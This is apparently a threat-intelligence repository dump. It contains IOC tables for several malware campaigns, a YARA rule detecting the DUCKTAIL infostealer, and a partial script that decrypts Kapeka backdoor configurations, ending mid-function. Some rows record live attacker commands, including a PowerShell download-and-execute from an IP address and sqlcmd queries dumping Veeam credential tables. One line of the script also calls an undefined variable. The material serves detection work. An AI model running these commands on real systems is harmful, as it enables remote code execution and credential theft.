14 | Command line,powershell.exe -noni -nop -exe bypass -f \\XXX.XXX.XXX.XXX\ADMIN$\temp\nFcv5ke38cnE.ps1,Lateral movement - POWERTRASH script execution
15 | Command line,powershell.exe -noni -nop -exe bypass -f \\XXX.XXX.XXX.XXX\ADMIN$\temp\8MDg144UDiaz.ps1 \\XXX.XXX.XXX.XXX\ADMIN$\temp\tjRoG0vVn8OE.log,Lateral movement - Recon/Discovery script execution
16 | Command line,"C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -Command ""iex ((New-Object Net.WebClient).DownloadString('http://91.199.147.152/icsnd16_64refl.ps1'))""",POWERTRASH download and execution
17 | Command line,"powershell.exe -ex bypass -noprof -nolog -nonint -f ""C:\Windows\TEMP\934F.ps1""",PowerShell execution command
18 | Command line,curl -O https://temp.sh/eJkTm/gup18.ps1,"Download POWERHOLD ""gup18.ps1"""
19 | Command line,whoami,Hands-on command
20 | Command line,systeminfo,Hands-on command
21 | Command line,ping -n 1 -a XXX.XXX.XXX.XXX,Hands-on command
22 | Command line,"wmic /user:""REDACTED"" /password:""REDACTED"" /node:""XXX.XXX.XXX.XXX"" process list brief",Hands-on command
23 | Command line,net use w: \\XXX.XXX.XXX.XXX\c$ /user:XXX.XXX.XXX.XXX\REDACTED REDACTED,Hands-on command
24 | Command line,net use w: /d /y,Hands-on command
25 | Command line,"WMIC LOGICALDISK GET Name,Size,FreeSpace",Hands-on command
26 | Command line,ipconfig /all,Hands-on command
27 | Command line,tasklist /v,Hands-on command
28 | Command line,netstat -aon,Hands-on command
29 | Command line,nslookup myip.opendns.com. resolver1.opendns.com,Hands-on command
30 | Command line,"reg query ""HKLM\software\veeam\veeam backup and replication""",Hands-on command
31 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup-2 SELECT top 100 * FROM Credentials;""",Hands-on command
32 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM JobSourceRepositories;""",Hands-on command
33 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM BJobs.VSphereInfo;""",Hands-on command
34 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM SmbFileShares;""",Hands-on command
35 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM VSphere.Workspaces;""",Hands-on command
36 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM ObjectsInBackups;""",Hands-on command
37 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM BackupRepositories;""",Hands-on command
38 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM PhysicalHosts;""",Hands-on command
39 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM Ssh_creds;""",Hands-on command
40 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM HostNetwork;""",Hands-on command
41 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM HostCreds;""",Hands-on command
42 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM Backups;""",Hands-on command
43 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM Locations;""",Hands-on command
44 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM BJobs;""",Hands-on command
45 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM PhysicalHostsServersLink;""",Hands-on command
46 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM ObjectsInJobs;""",Hands-on command
47 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM Hosts;""",Hands-on command
48 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM JobVssCredsView;""",Hands-on command
49 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM HostsByJobs;""",Hands-on command
50 | Command line,"sqlcmd.exe -S localhost\VEEAMSQL2016 -E -Q ""use VeeamBackup SELECT top 100 * FROM HostCreds;""",Hands-on command


--------------------------------------------------------------------------------
/TangleCrypt/TangleCrypt_IOC.csv:
--------------------------------------------------------------------------------
 1 | Component,SHA256,Applied packers,Architecture,Payload compiler,Driver name,Targeted AV/EDR vendors,Cert thumbprint
 2 | STONESTOP,0b4295bcd7bf850fea2b1bc09f652da028af33d625b11781ac875c603a52e5a8,VMProtect + HeartCrypt,x86,GCC/MingW,zkjna.sys,Defender + ESET,
 3 | STONESTOP,0e7930481e53e4fc79a6aa9d1b037b4127d66a3138b8a1a03f1fc50ddec9f0a6,VMProtect + HeartCrypt,x86,GCC/MingW,Iezog.sys,Defender + TrendMicro,
 4 | STONESTOP,0eaa413dc13bc846258e5b4670142bea20e567065b7f4bbc135fe62d93878160,VMProtect + HeartCrypt,x86,GCC/MingW,mzhbx.sys,Defender + SentinelOne,
 5 | STONESTOP,147dee11a406a86dd9b42982c091e8acbaca13614edb75f447cbaffb23017a90,VMProtect + HeartCrypt,x86,GCC/MingW,nxaiJn.sys,Defender,
 6 | STONESTOP,15cd13e0cad20394ec1405748e4bd50e3f27313c6274aee098c4eb0ede970b4c,VMProtect,x64,GCC/MingW,pE6KNzQ.sys,Defender + TrendMicro,
 7 | STONESTOP,2073d94af0aa560c11e3399d2b83a720ee373a46ccf835486e57c37e3d1d9a25,VMProtect + HeartCrypt,x86,GCC/MingW,kcrWr.sys,Defender + Sophos + HitmanPro,
 8 | STONESTOP,28fa1789fff41060e35496507d518a032c2a6142712843eb98ff63f6ec99997a,VMProtect,x86,GCC/MingW,pcdar.sys,Defender + Sophos + HitmanPro,
 9 | STONESTOP,2936f5f3ff24f5bb42eace4ad2d64989b19dc6cd75d8f4ee83496ee6bdf169f6,VMProtect + TangleCrypt,x64,Visual Studio,fehmr.sys,Defender + Bitdefender,
10 | STONESTOP,43cd3f8675e25816619f77b047ea5205b6491137c5b77cce058533a07bdc9f98,VMProtect + HeartCrypt,x86,GCC/MingW,smuol.sys,Defender + ESET + Symantec + Sophos + HitmanPro + Webroot + Kaspersky,
11 | STONESTOP,4686bf07db10376fb4c8ce3b729c4ab60d89b454fc57feb39f9607cb43a081d9,VMProtect + HeartCrypt,x86,GCC/MingW,rWNvj.sys,Defender + SentinelOne,
12 | STONESTOP,48e6e071b70566bc9fabbbff995946076b410f5459356b65051ae10e04fe512f,VMProtect + HeartCrypt,x86,GCC/MingW,mraml.sys,Defender + Sophos + HitmanPro,
13 | STONESTOP,49ed990459486e569cd1428b045baff1e61b86cdeef84a75384b5f7f46bd678e,VMProtect + HeartCrypt,x86,GCC/MingW,mcqeh.sys,Defender + Fortinet + TrendMicro,
14 | STONESTOP,5baf5445c4b22c645ff6d509a744e0b6c96fe5c5ea84ed471421af890cfd8533,VMProtect + HeartCrypt,x86,GCC/MingW,wwSyR.sys,Defender + Bitdefender + ESET + Webroot,
15 | STONESTOP,5c8f53bd9eb13ac07ca5190ed0946c9feb5c73627bf5c0c9e79b28626310ad90,VMProtect + HeartCrypt,x86,GCC/MingW,hshhv.sys,Defender + SentinelOne (only drivers),
16 | STONESTOP,5e423483165666976997e17b9834b9f6bd0da6c4b0da23f45584203f7c08fe4c,VMProtect + HeartCrypt,x86,GCC/MingW,xtvwi.sys,Defender + Cylance,
17 | STONESTOP,77e089dfeb1d114d4171e461e0c4f36b895ed8ef5ee23e8b243bdf491837b5b6,VMProtect + HeartCrypt,x86,GCC/MingW,igJTf.sys,Defender + McAfee + TrendMicro,
18 | STONESTOP,9dd36887e84ec25414fee984e22e42b1a76e893f1d476d689d89719ffe8077ff,VMProtect + HeartCrypt,x86,GCC/MingW,mlwvu.sys,Defender + CrowdStrike,
19 | STONESTOP,aae2e7f4feb75a61c98a727a9da9c3eba213e9e43aa7c9e81e2b3c2f6439b908,VMProtect + HeartCrypt,x86,Visual Studio,iwzre.sys,Defender + Webroot,
20 | STONESTOP,b8c1f3d24f0282c84ed599147462d4031df43cd4fceef38afcee4b3fc8f16e7b,VMProtect + HeartCrypt,x86,GCC/MingW,xxvgw.sys,Defender + Cisco,
21 | STONESTOP,d2939cd18c9072488767520be081fef71d560896c6293b6633cab099fcd238ae,VMProtect + HeartCrypt,x86,Visual Studio,zyzna.sys,Defender + SentinelOne,
22 | STONESTOP,ddf23db6881e42e65440c26a208c9175ad705c708f0a5d8426a2636bad79777c,VMProtect + HeartCrypt,x86,GCC/MingW,dzken.sys,Defender + Symantec + F-Secure/WithSecure,
23 | STONESTOP,df6cb5199c272c491b3a7ac44df6c4c279d23f7c09daed758c831b26732a4851,VMProtect + HeartCrypt,x86,GCC/MingW,smuot.sys,Defender + ESET + Symantec + Sophos + HitmanPro + Webroot + Kaspersky,
24 | STONESTOP,e6309fdb03313dd1b62467684a49692de5c27bbc3c17e65e2010cfbf686a4bf3,VMProtect + HeartCrypt,x86,GCC/MingW,bukzc.sys,Defender + SentinelOne,
25 | STONESTOP,f11930cb70556941b6e3c8530956f1381a4cdbd1e3fe8e9f363487a73b45a9c0,VMProtect + HeartCrypt,x86,GCC/MingW,mnpki.sys,Defender + TrendMicro,
26 | STONESTOP,f1c37f93d000134b4bfe439add26f3c146958dd87b230123d58790fedce6336a,VMProtect + HeartCrypt,x86,GCC/MingW,scmsa.sys,Defender + Kaspersky,
27 | STONESTOP,f51397bb18e166c933fe090320ec23397fed73b68157ce86406db9f07847d355,VMProtect + HeartCrypt,x86,GCC/MingW,HvYit.sys,Defender + SentinelOne,
28 | STONESTOP,fb3fc93dc627c7dfd8d95c1d66c2cb66caac92783b6d6eb33ac5b91647871ae6,VMProtect + TangleCrypt,x64,GCC/MingW,fehmr.sys,Defender + Bitdefender,
29 | ABYSSWORKER,0142346650907fe3b7ef7313be6863b15413b17b1ee900efa77f9b7c923718cf,VMProtect,x64,,,,D01B544CF4A4F901FA496BEA2B3A8F66F9583CB2
30 | ABYSSWORKER,05f8f514d1367aca856564af5443a75f47d22a30ce63f0b024a41e6b9553a527,VMProtect,x64,,,,7749BE16F266669D505684E9F002C689706C4295
31 | ABYSSWORKER,06eccd102c9105957773b32538943531d9c39d0a504ceb3b9b155e97e3b0b134,VMProtect,x64,,,,7749BE16F266669D505684E9F002C689706C4295
32 | ABYSSWORKER,1e42c8cb410a7ed653cfe62bbd8cf191f31a47337fe1ffcc35232d03f2da05ef,VMProtect,x64,,,,D01B544CF4A4F901FA496BEA2B3A8F66F9583CB2
33 | ABYSSWORKER,3fbe5a1ed857a6736e061a6850706f9e8a7e881f024bff044df1c34795b89bf4,VMProtect,x64,,,,7749BE16F266669D505684E9F002C689706C4295
34 | ABYSSWORKER,6a2a0f9c56ee9bf7b62e1d4e1929d13046cd78a93d8c607fe4728cc5b1e8d050,CodeVirtualizer,x64,,,,0786E6A95B9B6FC9495F319AC2E334103AAB292F
35 | ABYSSWORKER,927e3aef03a8355d236230cace376b3023480a40c5ac08453c07dab343dd1f11,VMProtect,x64,,,,D01B544CF4A4F901FA496BEA2B3A8F66F9583CB2
36 | ABYSSWORKER,a2e49aaa95f50438153ca6e55c909229df3a006b324622cc32477479de0afb6b,VMProtect,x64,,,,00F1435238447BBA9560E2A9A8C781861EBB15BC
37 | ABYSSWORKER,efb642ad3fab4a2e6cb4de829b60e04dd0d9ae7c2b4cf544de28c38f978b4136,VMProtect,x64,,,,D01B544CF4A4F901FA496BEA2B3A8F66F9583CB2
38 | XWorm,73b6e7cdd10c373a633367fd3bde791278e7900b342a21e2bad2b8e5cfc33746,TangleCrypt,x86,,,,
39 | 


--------------------------------------------------------------------------------
/KeeLoader/keeloader_iocs.csv:
--------------------------------------------------------------------------------
  1 | Ransomware Incident IOCs,Other context
  2 | hxxps://lvshilc[.]com/KeePass-2.56-Setup.exe ,Final redirect - KeeLoader downloader URL
  3 | hxxps://keeppaswrd[.]com/download.php ,Typosquat redirect url
  4 | hxxps://arch-online[.]com/List/com2/9O29EO3IRSBB ,Cobalt Strike C2 URL
  5 | hxxps://aicmas[.]com/List/com2/9O29EO3IRSBB ,Cobalt Strike C2 URL
  6 | hxxps://aicmas[.]com/Apply/readme/VJICARU60DC?[REDACTED]=[REDACTED] ,Cobalt Strike C2 URL
  7 | KeePass-info[.]aenys[.]com ,Malvertised domain
  8 | keeppaswrd[.]com ,Typosquat redirect domain
  9 | lvshilc[.]com ,Final redirect - KeeLoader downloader domain
 10 | arch-online[.]com ,Cobalt Strike C2 domain
 11 | aicmas[.]com ,Cobalt Strike C2 domain
 12 | ,
 13 | Nitrogen IOCs,
 14 | 1ba8d063-0[.]b-cdn[.]net,Cobalt Strike Nitrogen Cluster C2
 15 | roatanforareason[.]com/wp-content/plugins/fix/TreeSizeFreeSetup.zip,Nitrogen Download URL
 16 | 2dd75a7f9948d794e95539b9a9ccc6a1488fb64dbe099fea401a13f98166d6ae,WinSCP – Nitrogen
 17 | 5b48bbf2364f78812ea411ef41fb8b693a3965df13596b303e12f69908784d03,TreeSize Free – Nitrogen
 18 | fa3eca4d53a1b7c4cfcd14f642ed5f8a8a864f56a8a47acbf5cf11a6c5d2afa2,WinSCP – Nitrogen
 19 | ,
 20 | KeePass download domains,
 21 | KeePass-download.grmspace[.]com,Other malvertised KeeLoader domain
 22 | KeePass-download[.]insightsforconsultancy[.]com,Other malvertised KeeLoader domain
 23 | KeePassx[.]com,Typosquat KeePass domain
 24 | keegass[.]com,Typosquat KeePass domain
 25 | keebass[.]com,Typosquat KeePass domain
 26 | keespass[.]biz,Typosquat KeePass domain
 27 | KeePass[.]me,Typosquat KeePass domain
 28 | alldataservice[.]com,KeePass exfil domain
 29 | howupbusiness[.]com,KeePass exfil domain
 30 | ,
 31 | Suspicious Domains (Other),
 32 | salliemae-com-login[.]aenys[.]com,Other suspicious subdomains of Aenys
 33 | winscp-net-download[.]aenys[.]com,Other suspicious subdomains of Aenys
 34 | woodforest-login[.]aenys[.]com,Other suspicious subdomains of Aenys
 35 | phantom-wallet-com[.]aenys[.]com,Other suspicious subdomains of Aenys
 36 | dexscreener-com[.]aenys[.]com,Other suspicious subdomains of Aenys
 37 | Pump-fun[.]aenys[.]com,Other suspicious subdomains of Aenys
 38 | Pump-fun-official[.]aenys[.]com,Other suspicious subdomains of Aenys
 39 | burleson-appliance[.]net,Content pivot from malvertised domain (Aenys)
 40 | concord-appliance[.]com,Content pivot from malvertised domain (Aenys)
 41 | desoto-appliance[.]net,Content pivot from malvertised domain (Aenys)
 42 | resvat[.]com,Content pivot from malvertised domain (Aenys)
 43 | takuripo[.]com,Content pivot from malvertised domain (Aenys)
 44 | zowhy[.]com,Content pivot from malvertised domain (Aenys)
 45 | smakotin[.]com,Content pivot from malvertised domain (Aenys)
 46 | resvat[.]co,Content pivot from malvertised domain (Aenys)
 47 | protek-tech[.]com,Content pivot from malvertised domain (Aenys)
 48 | larcausk[.]site,Content pivot from malvertised domain (Aenys)
 49 | nestlingspace[.]com,Content pivot from malvertised domain (Aenys)
 50 | animatedwebworks[.]com,Content pivot from malvertised domain (Aenys)
 51 | "precizeabrilliant[,]com",Content pivot from malvertised domain (Aenys)
 52 | cadcamlabs[.]ru,Content pivot from malvertised domain (Aenys)
 53 | prythera[.]com,Content pivot from malvertised domain (Aenys)
 54 | ,
 55 | Certificates Observed,
 56 | Name: Redstrikevn Company Limited,
 57 | Serial number: 00 8A 99 59 F5 36 A0 03 6F 49 A2 14 33 17 56 2D 3F,
 58 | Thumbprint: 4D36C5325245186319D22BB933EE4C9289FAC559,
 59 | ,
 60 | Name: ООО НЕВА КЕРАМИКС (Revoked),
 61 | Serial number: 4645E8244D0240FED60A8923999340F10F363EA5,
 62 | Thumbprint: 4645E8244D0240FED60A8923999340F10F363EA5,
 63 | ,
 64 | Name: ANALYZER ENTERPRISES LLP,
 65 | Serial number: 41 23 C6 2D FD 13 EF 9C C0 69 0E 57,
 66 | Thumbprint: F3082CA729AA18DC86DD70A87B75ED473B4B0C15,
 67 | ,
 68 | "Name      Shenzhen Kantianxia Network Technology Co., Ltd.",
 69 | Thumbprint   2CF75DAE1A87CA7962CAF67E7310420BBBC30588,
 70 | Serial Number 52 B0 5A 2A 3A D5 CA E2 94 6C 80 F5 B6 21 E3 82,
 71 | ,
 72 | "Name: MekoGuard Bytemin Information Technology Co., Ltd.",
 73 | Serial number: 26 A6 81 9A C8 1B 7A 25 BC E7 D3 54,
 74 | Thumbprint: A53E2045C456BC5879E1159245884740FF0BE11D,
 75 | ,
 76 | Name: AVARKOM LLC,
 77 | Serial number: 24 83 90 00 0F C9 ED 9D D9 28 5F C2,
 78 | Thumbprint: 7020BB7A7A798C1BE684569FAD4CFE4956E7C856,
 79 | ,
 80 | Name: S.R.L. INT-MCOM,
 81 | Serial number: 05c1f7dd747b1af79ac427a15a8b64ae,
 82 | Thumbprint: 467c6c43e6fbb17fcaefb46fc41a6b2b829e0efa,
 83 | ,
 84 | KeePass Installers,
 85 | 0e5199b978ae9816b04d093776b6699b660f502445d5850e88726c05e933e7d8,
 86 | 83a13d14e1cbc25e46be87472de1956ac91727553bb3f019997467b2bab2658f,
 87 | 2c510f9ae4472342faafb7f2a1f278160f3581ead8ccd5b7ba7951863dcba2f5,
 88 | c6ed28cc576340b9f0e9324bef8c8c428bcd32c5234be73b885caa20549f332b,
 89 | 0000cff6a3c7f7eebc0edc3d1e42e454ebb675e57d6fc1fd968952694b1b44b3 ,
 90 | 1e6acd62927a272c41eb1def436d301ab8cbfc3bda459231bc2e696225eb5715,Added after report release
 91 | ,
 92 | KeePass Executables,
 93 | f1c6d8e594f85cd2cb844a3e8a90509ea137a67d7ef3f1b68a7be17df6ccac74,
 94 | 128a68a714f2f6002f5e8e8cfe0bbae10cd2ffe63d30c8acc00255b9659ce121,
 95 | 9cb3de5d5cc804235bd12c00ed45ec9d6116cc2c7523986dddb4d8643d54f5e,
 96 | a5e643c6cda31e0c7691dab58febe2efce0e98c33b19fe495b74b885de134a22,
 97 | b51dc9ca6f6029a799491bd9b8da18c9d9775116142cedabe958c8bcec96a0f0,
 98 | ,
 99 | ShInstUtil Files,
100 | 0f6cfb62ed2f118c776a049b93e5d3e7b226f74e7b466c1cfed3c449ed23a42b,
101 | 42d391dd7bfa4ea348ec1cd2620ea6458b37682f2b303e4a266e3d11a689f8ab,
102 | 3733b3be213ee4b959b70ff070b46e30b2785b14f1aecb74e0788dd00a1e1853,
103 | 0fc4397d28395974bba2823a1d2437b33793127b8f5020d995109207a830761b ,


--------------------------------------------------------------------------------
/DUCKTAIL/ducktail_dotnet_core_infostealer.yar:
--------------------------------------------------------------------------------
  1 | rule ducktail_dotnet_core_infostealer  
  2 | {
  3 |     meta:
  4 |         author="WithSecure"
  5 |         description="Detects DUCKTAIL malware written in .NET Core"
  6 |         date="2022-07-18"
  7 |         version="1.0"
  8 |         reference="https://labs.withsecure.com/publications/ducktail"
  9 |         hash1="b260f3857990e11fa267d3f1cad4c9bed59a9d4b"
 10 |         hash2="db74863c01817bf4eba39cd8a0ebbce9bda85a37"
 11 |         hash3="3a4b395301f61b7e6afc0ab27dc02331455181d0"
 12 |     strings:
 13 |         $dotnet_core_bundle_signature = { 8B 12 02 B9 6A 61 20 38 72 7B 93 02 14 D7 A0 32 13 F5 B9 E6 EF AE 33 18 EE 3B 2D CE 24 B3 6A AE }
 14 |         // Facebook-related
 15 |         $fb_str_1 = "c_user" wide ascii
 16 |         $fb_str_2 = "https://business.facebook.com/security/twofactor/reauth/enter" wide ascii
 17 |         $fb_str_3 = "https://business.facebook.com/security/twofactor/reauth" wide ascii
 18 |         $fb_str_4 = "mbasic.facebook.com" wide ascii
 19 |         $fb_str_5 = "DTSGInitData\",[],{\"token\":\"" wide ascii
 20 |         $fb_str_6 = "www.facebook.com" wide ascii
 21 |         $fb_str_7 = "m.facebook.com" wide ascii
 22 |         $fb_str_8 = "business.facebook.com" wide ascii
 23 |         $fb_str_9 = "approvals_code=" wide ascii
 24 |         $fb_str_10 = "c_user=" wide ascii
 25 |         $fb_str_11 = "&__a=1&__comet_req=0&fb_dtsg=" wide ascii
 26 |         $fb_str_12 = "&__jssesw=1" wide ascii
 27 |         $fb_str_13 = "approvals_code=" wide ascii
 28 |         $fb_str_14 = "<BmLinks>k__BackingField" wide ascii
 29 |         $fb_str_15 = "set_FbCookies" wide ascii
 30 |         $fb_str_16 = "<AdsAccount>k__BackingField" wide ascii
 31 |         $fb_str_17 = "GetAllFbData" wide ascii
 32 |         $fb_str_18 = "get_account_id" wide ascii
 33 |         $fb_str_19 = "set_BmLinks" wide ascii
 34 |         $fb_str_20 = "GetBmLink" wide ascii
 35 |         $fb_str_21 = "GetBm" wide ascii
 36 |         $fb_str_22 = "ExtractUserId" wide ascii
 37 |         $fb_str_23 = "set_Bussinesses" wide ascii
 38 |         $fb_str_24 = "set_FbData" wide ascii
 39 |         $fb_str_25 = "get_Nguong" wide ascii
 40 |         $fb_str_26 = "ResetCookie" wide ascii
 41 |         $fb_str_27 = "set_UserId" wide ascii
 42 |         $fb_str_28 = "<Nguong>k__BackingField" wide ascii
 43 |         $fb_str_29 = "get_UserId" wide ascii
 44 |         $fb_str_30 = "set_Nguong" wide ascii
 45 |         $fb_str_31 = "AdsBusiness" wide ascii
 46 |         $fb_str_32 = "<FbData>k__BackingField" wide ascii
 47 |         $fb_str_33 = "<FbCookies>k__BackingField" wide ascii
 48 |         $fb_str_34 = "<invite_link>k__BackingField" wide ascii
 49 |         $fb_str_35 = "get_FbData" wide ascii
 50 |         $fb_str_36 = "get_invite_link" wide ascii
 51 |         $fb_str_37 = "get_Bussinesses" wide ascii
 52 |         $fb_str_38 = "GetNguong" wide ascii
 53 |         $fb_str_39 = "set_AdsAccount" wide ascii
 54 |         $fb_str_40 = "set_invite_link" wide ascii
 55 |         $fb_str_41 = "set_AllCookies" wide ascii
 56 |         $fb_str_42 = "get_business" wide ascii
 57 |         $fb_str_43 = "set_business" wide ascii
 58 |         $fb_str_44 = "<Bussinesses>k__BackingField" wide ascii
 59 |         $fb_str_45 = "GetAdsFromToken" wide ascii
 60 |         $fb_str_46 = "get_AdsAccount" wide ascii
 61 |         $fb_str_47 = "get_BmLinks" wide ascii
 62 |         $fb_str_48 = "FbDataScanner" wide ascii
 63 |         // Exfiltration-related
 64 |         $exfil_str_1 = "telegramBotClient_OnUpdate" wide ascii
 65 |         $exfil_str_2 = "telegramHandler" wide ascii
 66 |         $exfil_str_3 = "ZipArchive" wide ascii
 67 |         $exfil_str_4 = "KillItSame" wide ascii
 68 |         $exfil_str_5 = "1.txt" wide ascii
 69 |         $exfil_str_6 = ".zip" wide ascii
 70 |         $exfil_str_7 = "2.txt" wide ascii
 71 |         // Browser-related
 72 |         $browser_str_1 = "GetCookies" wide ascii
 73 |         $browser_str_2 = "get_AllCookies" wide ascii
 74 |         $browser_str_3 = "ChromiumBrowser" wide ascii
 75 |         $browser_str_4 = "myBrowsers" wide ascii
 76 |         $browser_str_5 = "get_CookiePath" wide ascii
 77 |         $browser_str_6 = "ScanFirefox" wide ascii
 78 |         $browser_str_7 = "get_FbCookies" wide ascii
 79 |         $browser_str_8 = "ScanChomium" wide ascii
 80 |         $browser_str_9 = "BrowserScanner" wide ascii
 81 |         $browser_str_10 = "ScanChronium" wide ascii
 82 |         $browser_str_11 = "CookieData" wide ascii
 83 |         $browser_str_12 = "listBrowser" wide ascii
 84 |         $browser_str_13 = "BrowserCookie" wide ascii
 85 |         $browser_str_14 = "<Cookies>k__BackingField" wide ascii
 86 |         $browser_str_15 = "AddCookie" wide ascii
 87 |         $browser_str_16 = "set_CookiePath" wide ascii
 88 |         $browser_str_17 = "Local State" wide ascii
 89 |         $browser_str_18 = "select name, path, expires_utc, is_secure, is_httponly, host_key, encrypted_value  from cookies" wide ascii
 90 |         $browser_str_19 = "Google\\Chrome\\User Data" wide ascii
 91 |         $browser_str_20 = "Microsoft\\Edge\\User Data" wide ascii
 92 |         $browser_str_21 = "Cookies" wide ascii
 93 |         $browser_str_22 = "encrypted_key\":\"" wide ascii
 94 |      condition:
 95 |         uint16(0) == 0x5A4D
 96 |         and $dotnet_core_bundle_signature
 97 |         and (
 98 |             // 7 Facebook-related with either 7 browser or 3 exfil keywords found
 99 |             (7 of ($fb_str_*) and (7 of ($browser_str_*) or 3 of ($exfil_str_*))) 
100 |             // 7 Browser and 3 exfil keywords found
101 |             or (7 of ($browser_str_*) and 3 of ($exfil_str_*))
102 |         )
103 | }
104 | 


--------------------------------------------------------------------------------
/Kapeka/kapeka_extract_config.py:
--------------------------------------------------------------------------------
  1 | import pefile
  2 | import struct
  3 | import re
  4 | from Cryptodome.Cipher import AES
  5 | import sys
  6 | import string
  7 | import winreg
  8 | 
  9 | def is_file_provided():
 10 |     args = sys.argv
 11 |     if len(args) > 3:
 12 |         print('To extract from registry run: python kapeka_extract_config.py')
 13 |         print('To extract from file run: python kapeka_extract_config.py backdoor.exe')
 14 |         exit()
 15 |     elif len(args) == 2:
 16 |         return True
 17 |     else:
 18 |         return False
 19 | def read_file():
 20 |     try:
 21 |         file_path = sys.argv[1]
 22 |         file_data = None
 23 |         with open(file_path, 'rb') as f:
 24 |             file_data = f.read()
 25 |     except:
 26 |         print(f'Input file path ({file_path}) could not be read')
 27 |         exit()
 28 |     return file_data
 29 | 
 30 | 
 31 | 
 32 | def parse_config_binary(file_data, pe_file):
 33 |     if pe_file.FILE_HEADER.Machine == pefile.MACHINE_TYPE['IMAGE_FILE_MACHINE_I386']:
 34 |         egg_32bit = rb'\x68(....)\x68(....)\x8D\x4D\xEC\xE8....\x6A\x20\x68(....)\x8D\x4D\xD8\xE8....\x51\x8D\x55\xD8\x8D\x4D\xEC'
 35 |         print('Input file is 32-bit PE, looking for 32-bit pattern...')
 36 |         for m in re.finditer(egg_32bit, file_data):
 37 |             config_size = struct.unpack('<I',m.group(1))[0]
 38 |             config_va = struct.unpack('<I',m.group(2))[0]
 39 |             aes_key_va = struct.unpack('<I',m.group(3))[0]
 40 |             encrypted_config = pe_file.get_data(config_va - pe_file.OPTIONAL_HEADER.ImageBase, config_size)
 41 |             aes_key = pe_file.get_data(aes_key_va - pe_file.OPTIONAL_HEADER.ImageBase, 32)
 42 |             config = decrypt_aes(encrypted_config, aes_key).decode('utf-16')
 43 |             printable = set(string.printable)
 44 |             config = ''.join(filter(lambda x: x in printable, config))
 45 |             print(f'Extracted config: {config}')
 46 |             return
 47 |     elif pe_file.FILE_HEADER.Machine == pefile.MACHINE_TYPE['IMAGE_FILE_MACHINE_AMD64']:
 48 |         egg_64bit = rb'\x41\xB8(....)\x48\x8D\x15(....)\x48\x8D...?\xE8......?\x20\x00\x00\x00\x48\x8D\x15(....)'
 49 |         print('Input file is 64-bit PE, looking for 64-bit pattern...')
 50 |         for m in re.finditer(egg_64bit, file_data):
 51 |             config_size = struct.unpack('<I',m.group(1))[0]
 52 |             config_relative_offset = struct.unpack('<I',m.group(2))[0] + 4
 53 |             aes_key_relative_offset = struct.unpack('<I',m.group(3))[0] + 4
 54 |             config_match_offset = m.start(2)
 55 |             config_match_rva = pe_file.get_rva_from_offset(config_match_offset)
 56 |             aes_key_match_offset = m.start(3)
 57 |             aes_key_match_rva = pe_file.get_rva_from_offset(aes_key_match_offset)
 58 |             config_rva = config_match_rva + config_relative_offset
 59 |             aes_key_rva = aes_key_match_rva + aes_key_relative_offset
 60 |             aes_key_offset = pe.get_offset_from_rva(aes_key_rva)
 61 |             aes_key = file_data[aes_key_offset:aes_key_offset+32]
 62 |             config_offset = pe.get_offset_from_rva(config_rva)
 63 |             encrypted_config = file_data[config_offset:config_offset+config_size]
 64 |             config = decrypt_aes(encrypted_config, aes_key).decode('utf-16')
 65 |             printable = set(string.printable)
 66 |             config = ''.join(filter(lambda x: x in printable, config))
 67 |             print(f'Extracted config: {config}')
 68 |             return
 69 |     print('Config not found...')
 70 |     return
 71 | 
 72 | def parse_config_registry():
 73 |     try:
 74 |         registry_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Cryptography", 0, winreg.KEY_READ)
 75 |         value, regtype = winreg.QueryValueEx(registry_key, "MachineGuid")
 76 |         winreg.CloseKey(registry_key)
 77 |         key = value.encode('utf-16le')[:32]
 78 |     except:
 79 |         key = 'Azbi3l1xIgcRzTsOHopgrwUdJUMWpOFt'
 80 |         print(f'Failed reading MachineGuid... falling back to hardcoded value {key}')
 81 |     base_path = r"SOFTWARE\Microsoft\Cryptography\Providers"
 82 |     t = winreg.OpenKey(winreg.HKEY_CURRENT_USER, base_path, 0, winreg.KEY_ALL_ACCESS)
 83 |     for i in range(winreg.QueryInfoKey(t)[0]):
 84 |         aValue_name = winreg.EnumKey(t, i)
 85 |         oKey = winreg.OpenKey(t, aValue_name)
 86 |         sValue, sType = winreg.QueryValueEx(oKey, "Seed")
 87 |         config = decrypt_aes(sValue, key).decode('utf-16')
 88 |         printable = set(string.printable)
 89 |         config = ''.join(filter(lambda x: x in printable, config))
